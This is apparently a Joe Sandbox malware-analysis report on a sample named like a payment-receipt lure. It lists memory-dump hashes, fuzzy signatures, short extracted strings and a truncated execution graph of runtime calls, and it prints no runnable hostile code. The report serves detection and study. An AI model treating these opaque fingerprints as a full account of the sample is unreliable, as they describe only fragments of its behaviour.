                                                    • Instruction ID: b7ca501f6da9d013ea6cba6f61a2a7a4daff234bdf059df45fb5314ebbc3d856
                                                    • Opcode Fuzzy Hash: 1e4a7d84871f7837e830f83a9fb51d607008c50628076c157617c3134e1bd045
                                                    • Instruction Fuzzy Hash: 2E713574E2530A9FDB44CF99E9819EEFBB2FB88350F109429D514AB394D334AA41CF94
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: w7e^
                                                    • API String ID: 0-1657886525
                                                    • Opcode ID: f8dd81f55446d6231e30010641422cbf6bd833a01d662b7b212ccdb420547af3
                                                    • Instruction ID: 3fcab9602f0b362b353513c67e25dcb92d59d57714d76f97231f8938723b05e2
                                                    • Opcode Fuzzy Hash: f8dd81f55446d6231e30010641422cbf6bd833a01d662b7b212ccdb420547af3
                                                    • Instruction Fuzzy Hash: 5A4139B4E25349EFDF44CFA6C4405EEFBB2BB89200F14A42AC515B7264D7385642CFA8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0ni
                                                    • API String ID: 0-1488673370
                                                    • Opcode ID: 61d3628ab5cc0c006223aaca7377c30d883dc317fffe14ca311b2d997667d2e9
                                                    • Instruction ID: 30ba1ed204b0c05c389b42d3b4a5ba6e521fd565c0cfb2083b6a78c611b65aad
                                                    • Opcode Fuzzy Hash: 61d3628ab5cc0c006223aaca7377c30d883dc317fffe14ca311b2d997667d2e9
                                                    • Instruction Fuzzy Hash: 46515971E156188BEB68CF6B9D4479EFBF3AFC8301F14C1BA950CA6254EB301A858F51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: w7e^
                                                    • API String ID: 0-1657886525
                                                    • Opcode ID: 1cbe259ea9d305e40a74f964654f7407d2ab8c166fc766ed36bfe78ef5241877
                                                    • Instruction ID: cd8652d498dcdc9e66a418c8b96e775eaba07a16f0ca586efa41c68fb55892fa
                                                    • Opcode Fuzzy Hash: 1cbe259ea9d305e40a74f964654f7407d2ab8c166fc766ed36bfe78ef5241877
                                                    • Instruction Fuzzy Hash: 6F415A74E25359EFDB44CFA6C8405EEFBB2BB89300F18A86AC115B7264D7385641CF98
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 81c76fdeb24317aedb7c9f55544f15b26d5f249e702f3768ac75d6833f0291ff
                                                    • Instruction ID: 679db183cceda041773dc85292f8a0292fadba1e46d1a940d9c7288ee5ac83e6
                                                    • Opcode Fuzzy Hash: 81c76fdeb24317aedb7c9f55544f15b26d5f249e702f3768ac75d6833f0291ff
                                                    • Instruction Fuzzy Hash: EC42C374A0021A8FDB64CF59C984BA9FBB2FF48310F15C1A9D819AB751DB31AE85CF50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3e21708a026e3e4a14ec758c9f2337b1403a0458cf00fd376d8ab39002cff932
                                                    • Instruction ID: 344b5989192b6576f412b9ee319234accb8b542692cfe7fce6e10294091454bd
                                                    • Opcode Fuzzy Hash: 3e21708a026e3e4a14ec758c9f2337b1403a0458cf00fd376d8ab39002cff932
                                                    • Instruction Fuzzy Hash: D7D19E70E002188FCB54DF98C5846AEBFF2BF89305F24C1A9D418AB656D771DD82CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072322485.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5810000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aa8a53e571e84c5aa6d8dd0f1207ca1e7838a7ad829a7781c381ec65b295f18e
                                                    • Instruction ID: 6c8ba1cf6ae5100a5f06a155cd748413bc764c6f43d0760c1e341afb38f2e81f
                                                    • Opcode Fuzzy Hash: aa8a53e571e84c5aa6d8dd0f1207ca1e7838a7ad829a7781c381ec65b295f18e
                                                    • Instruction Fuzzy Hash: 3F1280F4C01746ABE710CF65E84C1897AB1FBA5328B90820DDE616B2E5DBBC194BCF45
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ff564db9cb4f33fb05969f9350d7ea43f5cb61ef07c59a80cfaec0e82ecf14f4
                                                    • Instruction ID: e77ef569ca24f4168ab7ba97e5286b9a18aead3ff4855b6cf6990ef7caccbd0f
                                                    • Opcode Fuzzy Hash: ff564db9cb4f33fb05969f9350d7ea43f5cb61ef07c59a80cfaec0e82ecf14f4
                                                    • Instruction Fuzzy Hash: 03E12B74E001598FDB54EFA8C5809AEFBF2FF89305F248169E414AB35AD730A941CFA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5fc4e056c51d60e7b851bac93df0690127c9bfcfd390064d767c35ed829cde2
                                                    • Instruction ID: bcaf461fa8e5e7851da86f5335ec1a510680d43c551d424ac304b2269f2a0629
                                                    • Opcode Fuzzy Hash: b5fc4e056c51d60e7b851bac93df0690127c9bfcfd390064d767c35ed829cde2
                                                    • Instruction Fuzzy Hash: 5BE11774E001198FDB54DFA9C5809AEFBF2BF89305F24C169E418AB35AD770A941CFA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 30306a3f8150bb432eec68148cfa5017b9e771910bb6e68322acb3cc9a8f32ce
                                                    • Instruction ID: 67aaa49fe7da845878d693bfe4cc947f6680b5642aeaa375168c1a314740aef5
                                                    • Opcode Fuzzy Hash: 30306a3f8150bb432eec68148cfa5017b9e771910bb6e68322acb3cc9a8f32ce
                                                    • Instruction Fuzzy Hash: C3E13B74E001198FDB54DFA9C5809AEFBF2FF89305F248169E414AB35ADB31AA41CF61
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 390e9e1b03852fafdfff2a8806d0669780e40fb8aa8e8f8c9df1f66550c8484c
                                                    • Instruction ID: f6a289aaaefd84ed8a295b075e1497c62acb3bbf1977c6905b64e06d319418e0
                                                    • Opcode Fuzzy Hash: 390e9e1b03852fafdfff2a8806d0669780e40fb8aa8e8f8c9df1f66550c8484c
                                                    • Instruction Fuzzy Hash: A0E11B74E001198FDB54DFA9C5809AEFBF2FF89305F248169E414AB35AD730AA45CFA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 85fb18a9e0fbe5a6cec1a8459d0b416680f7edf19e16cd1ebec4574744be43e8
                                                    • Instruction ID: 467654239d26feafed31c3c05a1b23bae4b668cacad038a35589ba804c8175dc
                                                    • Opcode Fuzzy Hash: 85fb18a9e0fbe5a6cec1a8459d0b416680f7edf19e16cd1ebec4574744be43e8
                                                    • Instruction Fuzzy Hash: 90E11A74E001198FDB54EFA9C5809AEFBF2FF89305F248169E414AB75AD730A941CFA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61defc7af3dfcdbe4801126738855327b8c7cd6ebb279250d928f28ce15c5c02
                                                    • Instruction ID: f2b5a58356f099a1d4edae4cc5fcb9357de3d9d2deab390ce2ee1314b7ffb0ed
                                                    • Opcode Fuzzy Hash: 61defc7af3dfcdbe4801126738855327b8c7cd6ebb279250d928f28ce15c5c02
                                                    • Instruction Fuzzy Hash: 42D1F431D2071A9ACB11EF64D990A9DB7B1FF95300F10D79AE10937215EBB0AAC9CF81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 959c83ab6b8d7a960ecdf521ccce92ac3220d92692c0a40e24a00f9330f20e9e
                                                    • Instruction ID: c36fdff8d5a154e9ae54b6eee56bef879949a73727378929d208d7c1cc0471e3
                                                    • Opcode Fuzzy Hash: 959c83ab6b8d7a960ecdf521ccce92ac3220d92692c0a40e24a00f9330f20e9e
                                                    • Instruction Fuzzy Hash: 52D1E431D2075A9ACB11EF64D990A9DB7B1FF95300F10D79AE10937215EBB06AC9CF81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7924a2d26a49c3bbca6513f09e80cda22fb2f3fcc9e77830313433187adfa6c8
                                                    • Instruction ID: e7ee892f51eb11c3c1314e21685cec76f9387dc15497f086c94e6faf17592df1
                                                    • Opcode Fuzzy Hash: 7924a2d26a49c3bbca6513f09e80cda22fb2f3fcc9e77830313433187adfa6c8
                                                    • Instruction Fuzzy Hash: 69A18032E00229CFCF19DFB4C84459EB7B2FF85314B15456AE806AB2A5DB75E94ACF40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072322485.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5810000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d4c978f7db182c6032c367717ec762b60b16b0bbf92e67ab61fd37daa18ca95d
                                                    • Instruction ID: 15a1e34681d1fdc6ab802d4c1c1c027877fd0602717f8250a2771343254dd14a
                                                    • Opcode Fuzzy Hash: d4c978f7db182c6032c367717ec762b60b16b0bbf92e67ab61fd37daa18ca95d
                                                    • Instruction Fuzzy Hash: 88C1F4F0C00746ABD715CF69E8481897BB1FBA5328B50860DDD616B2E5DBBC184BCF44
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0244cd49f59456c70017990d4fcfc40fca01aac8a16c396ef52f9ebdad1c1917
                                                    • Instruction ID: b9c602605f7ed8cbe19c6b3b912055518afaa40dde9261c7279f18b48bd92aae
                                                    • Opcode Fuzzy Hash: 0244cd49f59456c70017990d4fcfc40fca01aac8a16c396ef52f9ebdad1c1917
                                                    • Instruction Fuzzy Hash: 83810374E25209CFCB44CFA9C58499EFBF1FF88310F14A566D559AB221D334AA41CF91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7ffaedbea68617b0da08378adc64df34dc70ec4738d239d54d2687a5cd033ea
                                                    • Instruction ID: 27a7e0b4709b492c27251926249ea97ba89054f8a1c7b22c3e293f3d83870d34
                                                    • Opcode Fuzzy Hash: a7ffaedbea68617b0da08378adc64df34dc70ec4738d239d54d2687a5cd033ea
                                                    • Instruction Fuzzy Hash: 8C91E070E25219CFCB44CF99C58499EBBF2FB88310F24A559D559BB221D334AA41CF91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c6d34551a900fb542d8900b7a57850ea318150639a4454468d7dd07d6e4e5bba
                                                    • Instruction ID: c0277c7804d4a58f0fa07fd1e31c9ca081a622e5c6a7c004d9764f1ffc6879e5
                                                    • Opcode Fuzzy Hash: c6d34551a900fb542d8900b7a57850ea318150639a4454468d7dd07d6e4e5bba
                                                    • Instruction Fuzzy Hash: F8815B70E102199FDB54DFA9C5809AEFBB3BF89301F24D1A9D408A7356D730AA41CFA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 878ad7f34c0d1745789c88207f8869eb2853675490247c3b98cbd202e129cd61
                                                    • Instruction ID: 84ed82421f533e4ce7ef84e2a5ed09cd1b01fecc006a366eaf63fa5a96f64257
                                                    • Opcode Fuzzy Hash: 878ad7f34c0d1745789c88207f8869eb2853675490247c3b98cbd202e129cd61
                                                    • Instruction Fuzzy Hash: 07710A74E15609CFDB44CFA9C5805EEFBF2FF88350F24A42AD51ABB264D3349A418B64
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 117e0c09f3be9e99f3f8ffa0bed4ef945b8aaf7ba9851db4b08b5446e9f34aa2
                                                    • Instruction ID: 23e21b397457e2b1eecc926fb6fd866e269ada7cd68819ce7a17c004b69f01ec
                                                    • Opcode Fuzzy Hash: 117e0c09f3be9e99f3f8ffa0bed4ef945b8aaf7ba9851db4b08b5446e9f34aa2
                                                    • Instruction Fuzzy Hash: DE71F874E15609CFDB54CFA9C5805EEFBF2FF88350F24A42AD51ABB224D3349A418B64
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 945b397b2724505fe3ce781778d311fe6a8cd9cdf5ddd8fbbeabc734877d9161
                                                    • Instruction ID: 4977aa8054964f098b1d97eaabc3211894e1cdc65137f1223a472876e400ddb8
                                                    • Opcode Fuzzy Hash: 945b397b2724505fe3ce781778d311fe6a8cd9cdf5ddd8fbbeabc734877d9161
                                                    • Instruction Fuzzy Hash: 18512970E002198FDB54DFA9C5805AEFBF2BF89304F24C169D458AB71AD7309A42CFA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a1b8bba4ab1403b764cac705a19e1fab0373cb56d245c73f7ace1ef54e7a5f75
                                                    • Instruction ID: 2600127ca0cc8c2406aaea2a64d26ff3f4ff69258b2deb7139a1ebd121341032
                                                    • Opcode Fuzzy Hash: a1b8bba4ab1403b764cac705a19e1fab0373cb56d245c73f7ace1ef54e7a5f75
                                                    • Instruction Fuzzy Hash: 174127B0E1520ADFDB44CFAAC5815EEFBF2EF88300F24D56AC515A7254E7709A41CBA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6ba3163f3dfd8ab8a8e965a8f855ddf5e5f43f70a66206824e714f78b199c581
                                                    • Instruction ID: 2e6900bacbb2caaad8b1f9522fe8f9097cd56bf5c90e595abfc2e5c6f57461cb
                                                    • Opcode Fuzzy Hash: 6ba3163f3dfd8ab8a8e965a8f855ddf5e5f43f70a66206824e714f78b199c581
                                                    • Instruction Fuzzy Hash: AB415D70E1670ADFDB44CFA6C5415AEFBB2AF89300F24D4AAC104A7264E7749A41CB91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e923c8d5541348eeb3bed85377d284fa95e5e31da67ce0da0f5443a442329fe3
                                                    • Instruction ID: 2deca2e395b4539a70196f1f38c5720e4fb1815768aa6f2c80d5fabfc1a54c99
                                                    • Opcode Fuzzy Hash: e923c8d5541348eeb3bed85377d284fa95e5e31da67ce0da0f5443a442329fe3
                                                    • Instruction Fuzzy Hash: 5041E5B0E1560ADFDB44CFAAC5815EEFBF2EF88300F24D56AC515B7214E7309A418BA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4dbddc661f9b79c03536bfa243ea05b26d9f8e149cc273d222c5a3470b41bdfe
                                                    • Instruction ID: cdc090bde2acbbaaf13dd26cf3236a970d32f3444a8c7f2a85e6326ae7889e73
                                                    • Opcode Fuzzy Hash: 4dbddc661f9b79c03536bfa243ea05b26d9f8e149cc273d222c5a3470b41bdfe
                                                    • Instruction Fuzzy Hash: F2412970E1570AEFDB44CFAAD5416AEFBF2AF88300F20E46AC105B7264E77497418B94
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2f0ee290b32ec0b24b9705fb81b44023e10a707bda12ffd8eab955676247a70
                                                    • Instruction ID: 96cc4ca57d4096f796ec33d26f3ba998c08f57ac7d91a9486ae169967843894c
                                                    • Opcode Fuzzy Hash: b2f0ee290b32ec0b24b9705fb81b44023e10a707bda12ffd8eab955676247a70
                                                    • Instruction Fuzzy Hash: E14114B0E1560ADFDB48CFAAD4805AEFBF2AF89300F14D46AC519BB254D3359A41CF94
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 28092060a2453a06bbe285267831e1b35ba5fa8d97d31e86bd02875303224ff5
                                                    • Instruction ID: 759ad65106945998632cceecdd16a880e7359d8a2140de32ba2e73d8c78631cc
                                                    • Opcode Fuzzy Hash: 28092060a2453a06bbe285267831e1b35ba5fa8d97d31e86bd02875303224ff5
                                                    • Instruction Fuzzy Hash: E241C0B4E1560ADFDB48CFAAC4805EEFBF2AB88300F14D46AC519AB214D7359A41CF94
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d15c88b006da3daa74622153127dca415a5f14f03f3979cbd022f769c4b9d9be
                                                    • Instruction ID: 1bad56db0fa1bfe1df10050c2bb710d08cbdbf53c184ca50466e643829617f21
                                                    • Opcode Fuzzy Hash: d15c88b006da3daa74622153127dca415a5f14f03f3979cbd022f769c4b9d9be
                                                    • Instruction Fuzzy Hash: 3521FC71E157189BEB58CF6B980069EFBF3AFC9210F04C0BAD518B6255EB3005568F61
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                                    • API String ID: 0-471056614
                                                    • Opcode ID: e9a8526d2048c336326ec8710bceda604db6b77ef339c9523da6d553116d2e09
                                                    • Instruction ID: 998041d0212a3da10685d3f2d9375ee6e118baadb68c1762a27ae0710c4ddaf4
                                                    • Opcode Fuzzy Hash: e9a8526d2048c336326ec8710bceda604db6b77ef339c9523da6d553116d2e09
                                                    • Instruction Fuzzy Hash: 75411030E012069FC708EF74E491A5E7BB6FF54304B50856DD415AB2A9EF386D06CF92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                                    • API String ID: 0-471056614
                                                    • Opcode ID: 245f044c31ac04cf2685a1988170849e09d86f24dac99ae721871a9e91f5cf0c
                                                    • Instruction ID: 99ff006f0e83faaf56ba829c8683dd1a1318755852e7f32670213d89d6574378
                                                    • Opcode Fuzzy Hash: 245f044c31ac04cf2685a1988170849e09d86f24dac99ae721871a9e91f5cf0c
                                                    • Instruction Fuzzy Hash: 88411230E011069FCB08EF74F45195E7BB6FF54300B50956DD415AB2A9EF386D06CB92

                                                    Execution Graph

                                                     Execution Coverage: 2.6%
                                                     Dynamic/Decrypted Code Coverage: 100%
                                                     Signature Coverage: 2.6%
                                                     Total number of Nodes: 1668
                                                     Total number of Limit Nodes: 5
                                                    execution_graph 6510 10008640 6513 10008657 6510->6513 6514 10008665 6513->6514 6515 10008679 6513->6515 6518 10006368 _free 20 API calls 6514->6518 6516 10008681 6515->6516 6517 10008693 6515->6517 6520 10006368 _free 20 API calls 6516->6520 6524 10008652 6517->6524 6526 100054a7 6517->6526 6519 1000866a 6518->6519 6521 100062ac ___std_exception_copy 26 API calls 6519->6521 6522 10008686 6520->6522 6521->6524 6525 100062ac ___std_exception_copy 26 API calls 6522->6525 6525->6524 6527 100054ba 6526->6527 6528 100054c4 6526->6528 6527->6524 6528->6527 6529 10005af6 _abort 38 API calls 6528->6529 6530 100054e5 6529->6530 6534 10007a00 6530->6534 6535 10007a13 6534->6535 6536 100054fe 6534->6536 6535->6536 6542 10007f0f 6535->6542 6538 10007a2d 6536->6538 6539 10007a40 6538->6539 6540 10007a55 6538->6540 6539->6540 6677 10006d7e 6539->6677 6540->6527 6543 10007f1b ___DestructExceptionObject 6542->6543 6544 10005af6 _abort 38 API calls 6543->6544 6545 10007f24 6544->6545 6546 10007f72 _abort 6545->6546 6554 10005671 RtlEnterCriticalSection 6545->6554 6546->6536 6548 10007f42 6555 10007f86 6548->6555 6553 100055a8 _abort 38 API calls 6553->6546 6554->6548 6556 10007f56 6555->6556 6557 10007f94 __fassign 6555->6557 6559 10007f75 6556->6559 6557->6556 6562 10007cc2 6557->6562 6676 100056b9 RtlLeaveCriticalSection 6559->6676 6561 10007f69 6561->6546 6561->6553 6563 10007d42 6562->6563 6566 10007cd8 6562->6566 6564 10007d90 6563->6564 6567 1000571e _free 20 API calls 6563->6567 6630 10007e35 6564->6630 6566->6563 6568 10007d0b 6566->6568 6573 1000571e _free 20 API calls 6566->6573 6569 10007d64 6567->6569 6570 10007d2d 6568->6570 6575 1000571e _free 20 API calls 6568->6575 6571 1000571e _free 20 API calls 6569->6571 6572 1000571e _free 20 API calls 6570->6572 6574 10007d77 6571->6574 6577 10007d37 6572->6577 6579 10007d00 6573->6579 6576 1000571e _free 20 API calls 6574->6576 6581 10007d22 6575->6581 6582 10007d85 
